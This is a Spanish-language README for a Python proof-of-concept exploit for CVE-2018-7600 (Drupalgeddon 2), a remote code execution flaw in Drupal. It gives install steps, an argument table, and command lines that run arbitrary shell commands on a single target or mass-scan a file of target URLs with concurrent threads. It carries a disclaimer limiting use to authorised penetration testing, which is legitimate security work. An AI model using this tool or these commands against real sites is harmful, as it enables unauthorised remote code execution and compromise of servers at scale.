
Este repositorio presenta un Proof-of-Concept (PoC) desarrollado por completo desde cero para CVE-2018-7600, ampliamente conocido como Drupalgeddon 2. Esta vulnerabilidad crítica en el núcleo de Drupal 7 y 8 permite la ejecución remota de código (RCE), y el PoC demuestra su explotación de forma clara y didáctica.
Este repositorio contiene un exploit de prueba de concepto basado en Python para la vulnerabilidad crítica de ejecución remota de código en Drupal, conocida como Drupalgeddon2 (CVE-2018-7600). Este script está diseñado con fines educativos y para que los profesionales de la seguridad lo utilicen en escenarios de pruebas de penetración autorizados.
Esta herramienta está destinada únicamente a fines legales y éticos. Utilizar este script en cualquier sistema sin el permiso explícito del propietario es ilegal. El autor y los colaboradores no son responsables del mal uso ni de los daños causados por este script. Úsalo bajo tu propio riesgo.
requestscoloramagit clone <repository-url>
cd <repository-directory>
pip install -r requirements.txt
pip install requests colorama
El script ofrece varios argumentos de línea de comandos para personalizar su ejecución.
Explota un único objetivo con el comando predeterminado (whoami):
python3 drupalgeddon2.py -t http://example.com
Explota un único objetivo con un comando personalizado (por ejemplo, ls -la):
python3 drupalgeddon2.py -t http://vulnerable-drupal.site -c "ls -la"
Escanea una lista de objetivos desde un archivo:
Crea un archivo llamado targets.txt con una URL por línea:
http://site1.com
https://site2.org
http://site3.net
Luego ejecuta el script:
python3 drupalgeddon2.py -l targets.txt
Escanea una lista con un comando personalizado y más hilos:
python3 drupalgeddon2.py -l targets.txt -c "uname -a" -T 10
Guarda la salida en un archivo de registro:
python3 drupalgeddon2.py -l targets.txt -o scan_results.log
| Argumento | Corto | Descripción | Predeterminado |
|---|---|---|---|
--target | -t | Una única URL objetivo. | - |
--list | -l | Ruta a un archivo que contiene una lista de URLs objetivo. | - |
--command | -c | El comando a ejecutar en el objetivo. | whoami |
--threads | -T | Número de hilos concurrentes a utilizar. | 5 |
--output | -o | Archivo para guardar el registro de la salida. | - |
--timeout | Tiempo de espera de la solicitud en segundos. | 15 |